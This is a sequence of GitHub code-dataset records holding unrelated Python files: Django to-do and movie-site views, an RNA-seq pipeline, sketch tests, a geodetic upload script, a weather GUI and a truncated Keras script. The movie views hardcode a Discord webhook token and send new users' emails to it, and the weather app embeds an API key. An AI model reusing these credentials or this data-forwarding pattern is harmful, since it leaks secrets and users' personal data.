import TaskSerializer\n# Create your views here.\n\n\n@api_view(('GET',))\ndef TaskListView(request, *args, **kwargs):\n queryset = Task.objects.all()\n serializer = TaskSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\n@api_view(('GET',))\ndef TaskDetailView(request, pk):\n queryset = Task.objects.get(id=pk)\n serializer = TaskSerializer(queryset, many=False)\n return Response(serializer.data)\n\n\n@api_view(('POST',))\ndef TaskCreateView(request, *args):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid(): serializer.save()\n return Response(serializer.data)\n\n\n@api_view(('POST',))\ndef TaskUpdateView(request, pk):\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(instance=task, data=request.data)\n if serializer.is_valid():serializer.save()\n return Response(serializer.data)\n\n\n@api_view(('DELETE',))\ndef TaskDeleteView(request, pk):\n task = Task.objects.get(id=pk)\n task.delete()\n return Response(\"Task was deleted\")\n","repo_name":"amitkakde007/To-Do-App","sub_path":"ToDoApp/Tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9718128338","text":"# scripts to run data analysis on tuberous sclerosis mice\nfrom bipy.cluster import start_cluster, stop_cluster\nimport sys\nimport yaml\nfrom bipy.log import setup_logging, logger\nfrom bcbio.utils import safe_makedir, file_exists\nimport csv\nimport os\nfrom bipy.utils import (append_stem, combine_pairs, flatten, dict_to_vectors,\n prepare_ref_file, replace_suffix)\nfrom bipy.toolbox import (fastqc, sickle, cutadapt_tool, tophat,\n htseq_count, deseq, fastq, annotate, rseqc, sam)\nfrom bcbio.broad import BroadRunner, picardrun\n\nimport glob\nfrom itertools import product, repeat\n\n\ndef _get_stage_config(config, stage):\n return config[\"stage\"][stage]\n\n\ndef _get_program(config, stage):\n return config[\"stage\"][stage][\"program\"]\n\n\ndef _emit_stage_message(stage, curr_files):\n logger.info(\"Running %s on %s\" % (stage, curr_files))\n\ndef _find_input_files(config):\n input_dirs = config[\"input_dirs\"]\n \"\"\" find all of the fastq files by identifier \"\"\"\n identifier = config[\"sample_parse\"][\"identifier\"]\n input_files = [glob.glob(os.path.join(config[\"dir\"][\"data\"],\n input_dir,\n identifier))\n for input_dir in input_dirs]\n return list(flatten(input_files))\n\n\ndef _group_input_by_condition(in_files, delimiter = \"_\"):\n def _add_entry(d, v):\n base = os.path.basename(v)\n k = base.split(delimiter)[1]\n d[k] = d.get(k, []) + [v]\n return d\n\n return reduce(_add_entry, in_files, {})\n\n\ndef _group_input_by_cell_type(in_files, delimiter = \"_\"):\n def _add_entry(d, v):\n base = os.path.basename(v)\n k = base.split(delimiter)[0]\n if \"PbN\" in k:\n d[\"PbN\"] = d.get(\"PbN\", []) + [v]\n elif \"Pb\" in k:\n d[\"Pb\"] = d.get(\"Pb\", []) + [v]\n else:\n logger.error(\"Error grouping by cell type\")\n exit(-1)\n return d\n\n return reduce(_add_entry, in_files, {})\n\n\ndef main(config_file):\n with open(config_file) as in_handle:\n config = yaml.load(in_handle)\n\n # make the needed directories\n map(safe_makedir, config[\"dir\"].values())\n\n # specific for thesis pipeline\n input_dirs = config[\"input_dirs\"]\n\n results_dir = config[\"dir\"].get(\"results\", \"results\")\n input_files = _find_input_files(config)\n conditions = _group_input_by_condition(input_files)\n logger.info(\"Input_files: %s\" % (input_files))\n logger.info(\"Condition groups %s\" %(conditions))\n htseq_outdict = {}\n\n for condition, curr_files in conditions.items():\n condition_dir = os.path.join(results_dir, condition)\n safe_makedir(condition_dir)\n config[\"dir\"][\"results\"] = condition_dir\n\n for stage in config[\"run\"]:\n if stage == \"fastqc\":\n _emit_stage_message(stage, curr_files)\n fastqc_config = _get_stage_config(config, stage)\n fastqc_args = zip(*product(curr_files, [fastqc_config],\n [config]))\n view.map(fastqc.run, *fastqc_args)\n\n if stage == \"cutadapt\":\n _emit_stage_message(stage, curr_files)\n cutadapt_config = _get_stage_config(config, stage)\n cutadapt_args = zip(*product(curr_files, [cutadapt_config],\n [config]))\n cutadapt_outputs = view.map(cutadapt_tool.run, *cutadapt_args)\n curr_files = cutadapt_outputs\n logger.info(\"Fixing mate pair information.\")\n pairs = combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n logger.info(\"Forward: %s\" % (first))\n logger.info(\"Reverse: %s\" % (second))\n fixed = view.map(fastq.fix_mate_pairs_with_config,\n first, second, [config] * len(first))\n curr_files = list(flatten(fixed))\n\n if stage == \"sickle\":\n _emit_stage_message(stage, curr_files)\n pairs = combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n fixed = view.map(sickle.run_with_config,\n first, second, [config] * len(first))\n curr_files = list(flatten(fixed))\n\n if stage == \"tophat\":\n _emit_stage_message(stage, curr_files)\n tophat_config = _get_stage_config(config, stage)\n pairs = combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n logger.info(\"first %s\" % (first))\n logger.info(\"second %s\" % (second))\n\n #tophat_args = zip(*product(first, second, [config[\"ref\"]],\n # [\"tophat\"], [config]))\n tophat_outputs = view.map(tophat.run_with_config,\n first, second,\n [config[\"ref\"]] * len(first),\n [\"tophat\"] * len(first),\n [config] * len(first))\n bamfiles = view.map(sam.sam2bam, tophat_outputs)\n bamsort = view.map(sam.bamsort, bamfiles)\n view.map(sam.bamindex, bamsort)\n final_bamfiles = bamsort\n curr_files = tophat_outputs\n\n if stage == \"htseq-count\":\n _emit_stage_message(stage, curr_files)\n htseq_config = _get_stage_config(config, stage)\n htseq_args = zip(*product(curr_files, [config], [stage]))\n htseq_outputs = view.map(htseq_count.run_with_config,\n *htseq_args)\n htseq_outdict[condition] = htseq_outputs\n\n if stage == \"coverage\":\n logger.info(\"Calculating RNASeq metrics on %s.\" % (curr_files))\n nrun = len(curr_files)\n ref = prepare_ref_file(config[\"stage\"][stage][\"ref\"], config)\n ribo = config[\"stage\"][stage][\"ribo\"]\n picard = BroadRunner(config[\"program\"][\"picard\"])\n out_dir = os.path.join(results_dir, stage)\n safe_makedir(out_dir)\n out_files = [replace_suffix(os.path.basename(x),\n \"metrics\") for x in curr_files]\n out_files = [os.path.join(out_dir, x) for x in out_files]\n out_files = view.map(picardrun.picard_rnaseq_metrics,\n [picard] * nrun,\n curr_files,\n [ref] * nrun,\n [ribo] * nrun,\n out_files)\n\n if stage == \"rseqc\":\n _emit_stage_message(stage, curr_files)\n rseqc_config = _get_stage_config(config, stage)\n rseq_args = zip(*product(curr_files, [config]))\n view.map(rseqc.bam_stat, *rseq_args)\n view.map(rseqc.genebody_coverage, *rseq_args)\n view.map(rseqc.junction_annotation, *rseq_args)\n view.map(rseqc.junction_saturation, *rseq_args)\n RPKM_args = zip(*product(final_bamfiles, [config]))\n RPKM_count_out = view.map(rseqc.RPKM_count, *RPKM_args)\n RPKM_count_fixed = view.map(rseqc.fix_RPKM_count_file,\n RPKM_count_out)\n \"\"\"\n annotate_args = zip(*product(RPKM_count_fixed,\n [\"gene_id\"],\n [\"ensembl_gene_id\"],\n [\"human\"]))\n view.map(annotate.annotate_table_with_biomart,\n *annotate_args)\n \"\"\"\n view.map(rseqc.RPKM_saturation, *rseq_args)\n curr_files = tophat_outputs\n\n # combine htseq-count files and run deseq on them\n conditions, htseq_files = dict_to_vectors(htseq_outdict)\n deseq_config = _get_stage_config(config, \"deseq\")\n cell_types = _group_input_by_cell_type(htseq_files)\n for cell_type, files in cell_types.items():\n for comparison in deseq_config[\"comparisons\"]:\n comparison_name = \"_vs_\".join(comparison)\n deseq_dir = os.path.join(results_dir, \"deseq\", cell_type,\n comparison_name)\n safe_makedir(deseq_dir)\n out_file = os.path.join(deseq_dir, comparison_name + \".counts.txt\")\n files_by_condition = _group_input_by_condition(files)\n _emit_stage_message(\"deseq\", files_by_condition)\n c, f = dict_to_vectors(files_by_condition)\n combined_out = htseq_count.combine_counts(f,\n None,\n out_file)\n deseq_out = os.path.join(deseq_dir, comparison_name)\n logger.info(\"Running deseq on %s with conditions %s \"\n \"and writing ot %s\" % (combined_out,\n conditions,\n deseq_out))\n deseq_out = view.map(deseq.run, [combined_out], [c], [deseq_out])\n annotate.annotate_table_with_biomart(deseq_out[0],\n \"id\",\n \"ensembl_gene_id\",\n \"human\")\n #annotated_file = view.map(annotate.annotate_table_with_biomart,\n # [deseq_out],\n # [\"id\"],\n # [\"ensembl_gene_id\"],\n # [\"human\"])\n\n # end gracefully\n stop_cluster()\n\n\nif __name__ == \"__main__\":\n # read in the config file and perform initial setup\n main_config_file = sys.argv[1]\n with open(main_config_file) as config_in_handle:\n startup_config = yaml.load(config_in_handle)\n setup_logging(startup_config)\n start_cluster(startup_config)\n from bipy.cluster import view\n\n main(main_config_file)\n","repo_name":"parveezsha/gitlabjuly","sub_path":"projects/lu_rnaseq/scripts/lu_pipeline.py","file_name":"lu_pipeline.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10210255766","text":"from django.shortcuts import render\nfrom django.template.response import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom apigetmovie.api.request_api import RandomFilm\nfrom django.http import QueryDict\nfrom json import dumps\nfrom .models import Fav, UserFav\nfrom urllib.parse import parse_qs\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nfrom django.core.mail import send_mail\n\ndef index(request, id=-1):\n if request.method == 'POST':\n response_ajax = request.read().decode(\"UTF-8\")\n type_request = QueryDict(response_ajax).get('random')\n type_ = QueryDict(response_ajax).get('type')\n film = RandomFilm(type_)\n\n if type_request == 'false':\n res = film.get_film_for_id(id)\n\n else:\n res = film.get_film()\n\n if res is False:\n return HttpResponse(dumps({'error_api': 'Извините, но произошла неизвестная ошибка. Попробуйте еще раз'}))\n\n # проверяем есть ли фильм в избранном\n if request.user.is_authenticated:\n if type_request != \"false\":\n id = res['id']\n\n userid = User.objects.get(username=request.user.username).id\n if UserFav.objects.filter(userid=userid, favid=id).count() == 0:\n res.update({\"is_favorite\": False})\n else:\n res.update({\"is_favorite\": True})\n\n res.update({\"error_api\": \"\"})\n\n return HttpResponse(dumps(res))\n\n return render(request, 'index.html')\n\n\ndef signup(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.method == 'POST':\n errors = []\n response_ajax = parse_qs(request.read().decode(\"UTF-8\"))\n username = response_ajax['username'][0]\n email = response_ajax['email'][0]\n password = response_ajax['password'][0]\n password_repeat = response_ajax['password-repeat'][0]\n\n exist_email = User.objects.filter(email=email).count()\n if exist_email > 0:\n errors.append({'input': 'email','text': 'Данный email уже используется'})\n\n exist_username = User.objects.filter(username=username).count()\n\n if exist_username > 0:\n errors.append({'input': 'username','text': 'Пользователь с таким именем уже существует'})\n\n if password != password_repeat:\n errors.append({'input': 'password','text': 'Пароли не совпадают'})\n\n if errors != []:\n res = dumps({'signup': False, 'errors': errors})\n return HttpResponse(res)\n\n user = User.objects.create_user(username, email, password)\n user.save()\n\n user = authenticate(request, username=username, password=password)\n login(request, user)\n result = get_list_favorite(username)\n result.update({'login': True, 'signup': True})\n\n webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/726552664934187049/Ywj3iwcGtVPvNnuuCzfJY9xW0IhGt7y_oKUXXkWClR5bwShifYjjQrKXuUSA9z23cBRf')\n embed = DiscordEmbed(title='+1 Пользователь - ' + username, description='Email: ' + email, color=242424)\n # add embed object to webhook\n webhook.add_embed(embed)\n\n webhook_response = webhook.execute()\n\n return HttpResponse(dumps(result))\n\n return HttpResponseRedirect('/')\n\n\ndef logout_(request):\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef login_(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.method == 'POST':\n response_ajax = parse_qs(request.read().decode(\"UTF-8\"))\n username = response_ajax['username'][0]\n password = response_ajax['password'][0]\n\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n result = get_list_favorite(username)\n result.update({'login': True})\n return HttpResponse(dumps(result))\n else:\n return HttpResponse(dumps({'login': False}))\n\n return HttpResponseRedirect('/')\n\n\ndef get_user(request):\n if request.user.is_authenticated:\n username = request.user.username\n result = get_list_favorite(username)\n result.update({'username': username, })\n return HttpResponse(dumps(result))\n\n return HttpResponse(dumps({'username': False}))\n\n\ndef add_fav(request):\n\n if not request.user.is_authenticated:\n return HttpResponse(dumps({'fav_add': False, \"authenticated\": False}))\n\n if request.method == \"POST\":\n response_ajax = request.read().decode(\"UTF-8\")\n id = QueryDict(response_ajax).get('filmId')\n type_ = QueryDict(response_ajax).get('type')\n userid = User.objects.get(username=request.user.username).id\n\n favid_or_not = Fav.objects.filter(favid=id).count()\n\n if favid_or_not == 0:\n Fav.objects.create(favid=id, type=type_)\n\n obj_ = UserFav.objects.filter(favid=id, userid=userid).count()\n\n if obj_ == 0:\n UserFav.objects.create(userid=userid, favid=id)\n result = get_list_favorite(request.user.username)\n result.update({'fav_add': True, \"authenticated\": True})\n\n return HttpResponse(dumps(result))\n return HttpResponse(dumps({'fav_add': False, \"authenticated\": True}))\n\n return HttpResponseRedirect('/')\n\n\ndef remove_fav(request):\n if request.method == \"POST\":\n\n if not request.user.is_authenticated:\n return HttpResponse(dumps({'fav_remove': False, \"authenticated\": False}))\n\n response_ajax = request.read().decode(\"UTF-8\")\n id = QueryDict(response_ajax).get('filmId')\n userid = User.objects.get(username=request.user.username).id\n id_favorite_of_user = UserFav.objects.filter(favid=id, userid=userid)\n exist_id_favorite_of_user = id_favorite_of_user.count()\n\n if exist_id_favorite_of_user == 0:\n HttpResponse(dumps({\"error\": \"film not added to favorites list\"}))\n\n if id_favorite_of_user.delete():\n result = get_list_favorite(request.user.username)\n result.update({'error': False, })\n return HttpResponse(dumps(result))\n\n return HttpResponseRedirect('/')\n\n\ndef get_favs(request):\n\n if not request.user.is_authenticated:\n return HttpResponse(dumps({\"authenticated\": False}))\n\n if request.method == \"POST\":\n result = get_list_favorite(request.user.username)\n HttpResponse(dumps(result))\n\n return HttpResponseRedirect('/')\n\n\ndef get_list_favorite(username):\n userid = User.objects.get(username=username).id\n list_id = UserFav.objects.filter(userid=userid)\n result = []\n i = 1\n\n for id in list_id.all():\n type_ = Fav.objects.get(favid=id.get_favid()).get_type()\n film = RandomFilm(type_).get_film_for_id(id.get_favid())\n\n res = {\"id\": id.get_favid(), \"type\": type_, \"poster_path\": film[\"poster_path\"], \"title\": film[\"title\"], 'backdrop_path': film['backdrop_path'], 'genres': film['genres']}\n result.append(res)\n i +=1\n result = {\"favorites\": result, \"username\": username}\n return result\n\n\ndef feedback(request):\n if request.method == 'POST':\n response_ajax = request.read().decode(\"UTF-8\")\n text = QueryDict(response_ajax).get('text')\n name = QueryDict(response_ajax).get('name')\n send_mail(name, text, 'mittle.group@mittle.jetmovie.ru', ['mittle.studio@gmail.com'], fail_silently=False)\n webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/726552664934187049/Ywj3iwcGtVPvNnuuCzfJY9xW0IhGt7y_oKUXXkWClR5bwShifYjjQrKXuUSA9z23cBRf')\n\n embed = DiscordEmbed(title='Новое сообщение от ' + name, description='Текст: ' + text, color=242424)\n\n webhook.add_embed(embed)\n\n webhook_response = webhook.execute()\n return HttpResponse(dumps({'send': True,}))\n return HttpResponseRedirect('/')\n","repo_name":"Morozh/JetMovie","sub_path":"apigetmovie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24018875894","text":"import unittest\nimport logging\nimport time\n\nimport graphsignal\nfrom graphsignal.sketches.kll import KLLSketch\nfrom graphsignal import metrics_pb2\n\nlogger = logging.getLogger('graphsignal')\n\n\nclass KLLSketchTest(unittest.TestCase):\n def setUp(self):\n self.maxDiff = None\n\n def test_kll_update(self):\n k1 = KLLSketch()\n k1.update(1)\n k1.update(2)\n k1.update(2)\n k1.update(3.333)\n k1.update(1000)\n k1.update(0.0001)\n self.assertEqual(k1.count(), 6)\n self.assertEqual(\n k1.ranks(), [\n (0.0001, 1), (1, 2), (2, 3), (2, 4), (3.333, 5), (1000, 6)])\n self.assertEqual(k1.cdf(), [(0.0001, 0.16666666666666666), (1, 0.3333333333333333), (\n 2, 0.5), (2, 0.6666666666666666), (3.333, 0.8333333333333334), (1000, 1.0)])\n\n def test_kll_update_str(self):\n k1 = KLLSketch()\n k1.update('1')\n k1.update('2')\n k1.update('2')\n k1.update('3')\n self.assertEqual(k1.count(), 4)\n self.assertEqual(k1.ranks(), [('1', 1), ('2', 2), ('2', 3), ('3', 4)])\n self.assertEqual(\n k1.cdf(), [\n ('1', 0.25), ('2', 0.5), ('2', 0.75), ('3', 1.0)])\n\n def test_kll_merge(self):\n k1 = KLLSketch()\n\n k2 = KLLSketch()\n k2.update(1)\n k2.update(2)\n k1.merge(k2)\n\n k3 = KLLSketch()\n k3.update(1)\n k3.update(2)\n k3.update(12)\n k1.merge(k3)\n\n self.assertEqual(\n k1.cdf(), [\n (1, 0.2), (1, 0.4), (2, 0.6), (2, 0.8), (12, 1.0)])\n\n def test_kll_distribution(self):\n k1 = KLLSketch()\n for i in range(5):\n k1.update(1)\n k1.update(2)\n for i in range(100):\n k1.update(4)\n\n self.assertEqual(k1.distribution(), [[1, 5], [2, 1], [4, 100]])\n\n def test_kll_proto(self):\n k1 = KLLSketch()\n k1.update(1)\n k1.update(2)\n k1.update(3)\n\n window = metrics_pb2.PredictionWindow()\n proto = window.data_streams['1'].metrics['1'].distribution_value.sketch_kll10\n\n k1.to_proto(proto)\n\n self.assertEqual(proto.item_type, proto.ItemType.DOUBLE)\n\n k2 = KLLSketch()\n k2.from_proto(proto)\n\n self.assertEqual(k2._k, k1._k)\n self.assertEqual(k2._c, k1._c)\n self.assertEqual(k2._H, k1._H)\n self.assertEqual(k2._size, k1._size)\n self.assertEqual(k2._max_size, k1._max_size)\n self.assertEqual(k2.count(), k1.count())\n self.assertEqual(k2.ranks(), k1.ranks())\n self.assertEqual(k2.cdf(), k1.cdf())\n\n def test_kll_update_perf(self):\n s = KLLSketch()\n\n start = time.time()\n\n #import cProfile\n #from pstats import Stats, SortKey\n\n # with cProfile.Profile() as pr:\n for i in range(1000):\n s.update(i)\n\n #stats = Stats(pr)\n # stats.sort_stats(SortKey.CUMULATIVE).print_stats(25)\n\n took = time.time() - start\n print('KLL update (1000) took: ', took)\n #print('CDF', s.cdf())\n self.assertTrue(took < 1)\n\n def test_kll_merge_perf(self):\n import random\n sketches = []\n for i in range(1000):\n s = KLLSketch()\n s.update(random.randint(1, 100))\n sketches.append(s)\n\n start = time.time()\n\n ns = KLLSketch()\n for s in sketches:\n ns.merge(s)\n\n took = time.time() - start\n print('kll merge (1000) took: ', time.time() - start)\n #print('kll size: ', len(ns.serialize()))\n self.assertTrue(took < 1)\n","repo_name":"syllogy/graphsignal","sub_path":"graphsignal/sketches/kll_test.py","file_name":"kll_test.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"17210324587","text":"#!/usr/bin/python3\n\nimport argparse\nimport re\nimport os\nimport os.path\nimport md5\nimport sys\nimport zipfile\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Create a PositioNZ-PP station coordinate model upload file\"\n )\n parser.add_argument(\"zip_file\", help=\"Name of zip file to create\")\n parser.add_argument(\n \"spm_xml_file\",\n nargs=\"*\",\n help=\"Station prediction model XML files to upload CCCC.xml\",\n )\n parser.add_argument(\n \"-s\", \"--stn-dir\", help=\"Directory containing station coordinate XML files\"\n )\n parser.add_argument(\n \"-r\",\n \"--remove-file\",\n nargs=\"*\",\n help=\"The station code of files to remove from positionzpp\",\n )\n parser.add_argument(\n \"-o\",\n \"--overwrite\",\n action=\"store_true\",\n help=\"Allow overwriting an existing zip file\",\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Be verbose!\")\n\n args = parser.parse_args()\n verbose = args.verbose\n\n upload_key = \"GNSSSPM\"\n filere = re.compile(r\"^(\\w{4})\\.xml$\")\n\n if os.path.exists(args.zip_file) and not args.overwrite:\n print(\"Use -o to overwrite existing zip file \" + args.zip_file)\n sys.exit()\n\n codes = []\n files = []\n spmhash = \"\"\n spmdir = args.stn_dir or \".\"\n\n xmlfiles = list(args.spm_xml_file)\n if len(xmlfiles) == 0:\n xmlfiles = [f for f in os.listdir(spmdir) if filere.match(f)]\n\n for sfile in xmlfiles:\n if not sfile.endswith(\".xml\"):\n sfile = sfile + \".xml\"\n source = os.path.join(spmdir, sfile)\n if not os.path.exists(source):\n source = sfile\n if not os.path.exists(source):\n print(sfile, \"does not exist!\")\n continue\n filename = os.path.basename(source)\n match = filere.match(filename)\n if not match:\n print(sfile, \" is not a valid filename for a station prediction model\")\n continue\n code = match.group(1).upper()\n if verbose:\n print(\"Adding model for {0} from {1}\".format(code, source))\n codes.append(code)\n with open(source) as sf:\n data = sf.read()\n m = md5.new()\n m.update(upload_key)\n m.update(data)\n spmhash = spmhash + code + \".xml \" + m.hexdigest() + \"\\n\"\n files.append({\"file\": code + \".xml\", \"data\": data})\n\n remove_files = args.remove_file or []\n for rcode in remove_files:\n if not re.match(r\"^\\w{4}$\", rcode):\n print(\"Invalid code\".rcode, \" for removal\")\n continue\n rcode = rcode.upper()\n if rcode in codes:\n print(\"Cannot remove {0} as already used\".format(rcode))\n continue\n m = md5.new()\n m.update(upload_key)\n m.update(\"REMOVE\")\n m.update(rcode)\n m.update(\".xml\")\n spmhash = spmhash + rcode + \".xml \" + m.hexdigest() + \"\\n\"\n if verbose:\n print(\"Removing file \" + rcode)\n\n zipfilename = args.zip_file\n if not zipfilename.endswith(\".zip\"):\n zipfilename = zipfilename + \".zip\"\n zip = zipfile.ZipFile(zipfilename, \"w\", zipfile.ZIP_DEFLATED)\n zip.writestr(\"spm.hash\", spmhash)\n for f in files:\n zip.writestr(f[\"file\"], f[\"data\"])\n zip.close()\n if verbose:\n print(\"Zip file {0} ready for upload to PositioNZ-PP\".format(zipfilename))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linz/python-linz-stationcoordmodel","sub_path":"LINZ/positionzpp_spm_upload.py","file_name":"positionzpp_spm_upload.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38736686345","text":"from turtle import width\nfrom geopy.geocoders import Nominatim\nimport requests\nfrom datetime import datetime\nimport PySimpleGUI as sg\n\nclass Tela:\n def __init__(self):\n sg.theme('Reddit')\n\n lado_a = [\n [sg.Text('Cidade:', size=(10,1), font='Arial 12' ), sg.Input(key='cidade', size=(45,5), font='Arial 12'), sg.Button('Pesquisar', size=(10,1))], \n [sg.Text('Temperatura:',size=(10,1), font='Arial 12'), sg.Text(key='temp', size=(20,1), font='Arial 12')], \n [sg.Text('Mínima:',size=(10,1), font='Arial 12'), sg.Text(key='minima', size=(20,1), font='Arial 12')],\n [sg.Text('Máxima:',size=(10,1), font='Arial 12'), sg.Text(key='maxima', size=(20,1), font='Arial 12')],\n [sg.Text('Situação:',size=(10,1), font='Arial 12'), sg.Text(key='descricao', size=(20,1), font='Arial 12')],\n [sg.Text('Data/Hora:',size=(10,1), font='Arial 12'), sg.Text(key='data_hora', size=(20,1), font='Arial 12')],\n [sg.Text('Localização:',size=(10,1), font='Arial 12'), sg.Text(key='location', size=(50,3), font='Arial 12')] \n ]\n\n lado_b = [\n [sg.Image(source='logo.png')] \n ]\n\n layout = [\n [\n sg.Column(lado_a),\n sg.VSeparator(),\n sg.Column(lado_b)\n ]\n ]\n\n self.janela = sg.Window('Previsão do Tempo', layout)\n\n def Iniciar(self):\n\n while True:\n self.event, self.values = self.janela.Read()\n\n\n if self.event == sg.WINDOW_CLOSED:\n break\n if self.event == 'Pesquisar': \n\n try:\n #obtendo a latitude e longitude\n\n cidade = self.values['cidade']\n\n geolocator = Nominatim(user_agent=\"main\")\n location = geolocator.geocode(cidade)\n lon = location.longitude\n lat = location.latitude\n\n #fazendo a requisição da API\n key = '8cef1367f56402ade307b1eb06187765'\n \n request = requests.get('http://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&lang=pt_br&appid={}'.format(lat,lon, key))\n tempo = request.json() \n\n self.janela['temp'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp'] - 273.15))\n self.janela['minima'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp_min'] - 273.15))\n self.janela['maxima'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp_max'] - 273.15))\n self.janela['data_hora'].update(datetime.today().strftime('%d-%m-%Y - %H:%M'))\n self.janela['descricao'].update(tempo['weather'][0]['description'])\n self.janela['location'].update(location)\n except:\n self.janela['cidade'].update('Cidade não encontrada. Favor digitar novamente.')\n self.janela['temp'].update('')\n self.janela['minima'].update('')\n self.janela['maxima'].update('')\n self.janela['data_hora'].update('')\n self.janela['descricao'].update('')\n self.janela['location'].update('')\n\ntela = Tela()\ntela.Iniciar()","repo_name":"jnascimentocode/previsao_tempo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34776557203","text":"import sys\nsys.path.append(r'/home/elhanani/study/huji-deep/install')\nimport simnets.keras as sk\nimport keras\nfrom keras.datasets import mnist\nfrom keras.callbacks import TensorBoard\nfrom keras.models import Sequential, Model\nfrom keras.layers import add, RepeatVector, Input, Dense, Flatten, GlobalAveragePooling2D, Activation, Reshape, Conv2D, AveragePooling2D, BatchNormalization, Lambda, ZeroPadding2D\nfrom keras import backend as K\nimport tensorflow as tf\nimport numpy as np\nnp.random.seed(1)\n#with tf.device('/cpu:0'):\nif True:\n batch_size = 64\n num_classes = 10\n sim_kernel = 2\n sim_channels = 32\n mex_channels = sim_channels\n epochs = 30\n\n # input image dimensions\n img_rows, img_cols = 28, 28\n\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n\n assert(K.image_data_format() == 'channels_first')\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n print(x_train.mean(), x_train.min(), x_train.max())\n x_train = x_train / 255.0 - 0.5\n x_test = x_test / 255.0 - 0.5\n\n # ============\n N = 500\n x_test = x_test[:N]\n y_test = y_test[:N]\n x_train = x_train[:N*10]\n y_train = y_train[:N*10]\n # ============\n\n print(x_train.mean(), x_train.min(), x_train.max())\n\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n USE_PRETRAINED = False\n weights = np.load('/home/elhanani/notebooks/weights.npy')[()]\n\n # def norm_layer(x):\n # norm = sk.Mex(1, blocks=[int(x.shape[-3]), 1, 1],\n # softmax_mode=True, normalize_offsets=False,\n # use_unshared_regions=False, shared_offset_region=[-1],\n # offsets_initializer='zeros',\n # trainable=False)(x)\n # tile = Reshape((int(x.shape[-2]) * int(x.shape[-1]),))(norm)\n # tile = RepeatVector(int(x.shape[-3]))(tile)\n # tile = Reshape(x._keras_shape[-3:])(tile)\n # tile = Lambda(lambda x: -x)(tile)\n # normalized = add([x, tile])\n # return normalized, norm\n\n def sum_pooling_layer(x, pool_size):\n # Average pooling doesn't take padding area into consideration when using padding='same'\n # If we wish to add padding, we must do so externally with ZeroPadding2D so we would\n # be able to compute the sum pooling layer from the average pooling layer.\n x = AveragePooling2D(pool_size=pool_size, padding='valid')(x)\n x = Lambda(lambda x: x * pool_size[0] * pool_size[1])(x)\n return x\n\n\n def fixed_dirichlet_init(shape, dtype=None):\n if dtype is None:\n dtype = K.floatx()\n num_regions, num_instances, block_c, block_h, block_w = shape\n k = block_c * block_h * block_w\n # when given s as a size argument dirichlet function return an array with shape s + [k]\n # then we reshape the output to be of the same shape as the variable\n init_np = np.random.dirichlet([1] * k, size=(num_regions, num_instances)).astype(dtype)\n init_np = np.log(init_np)\n init_np = init_np.reshape(shape)\n return tf.constant(init_np)\n\n a = Input(shape=(1, img_rows, img_cols))\n if USE_PRETRAINED:\n templates_initializer= tf.constant_initializer(weights['sim_templates'])\n weights_initializer= tf.constant_initializer(weights['sim_weights'])\n else:\n templates_initializer = 'random_normal'\n weights_initializer = keras.initializers.constant(100)\n b = sk.Similarity(sim_channels,\n blocks=[2, 2], strides=[2, 2], similarity_function='L2',\n normalization_term=True, padding=[2, 2], out_of_bounds_value=np.nan, ignore_nan_input=True,\n normalization_term_fudge=1e-4,\n templates_initializer=templates_initializer,\n weights_initializer=weights_initializer)(a)\n i = 0\n # last_norm=None\n while b.shape[-2:] != (1, 1):\n mex_channels *= 2\n unshared = 2 #if i < 1 else int(b.shape[-2])\n #b, b_norm = norm_layer(b)\n b = sk.Mex(mex_channels,\n blocks=[int(b.shape[-3]), 1, 1], strides=[int(b.shape[-3]), 1, 1],\n softmax_mode=True, normalize_offsets=True,\n use_unshared_regions=True, unshared_offset_region=[unshared],\n offsets_initializer='dirichlet')(b)\n b = sum_pooling_layer(b, pool_size=(2, 2))\n # b_norm = sum_pooling_layer(b_norm, pool_size=(2, 2))\n # if last_norm is None:\n # 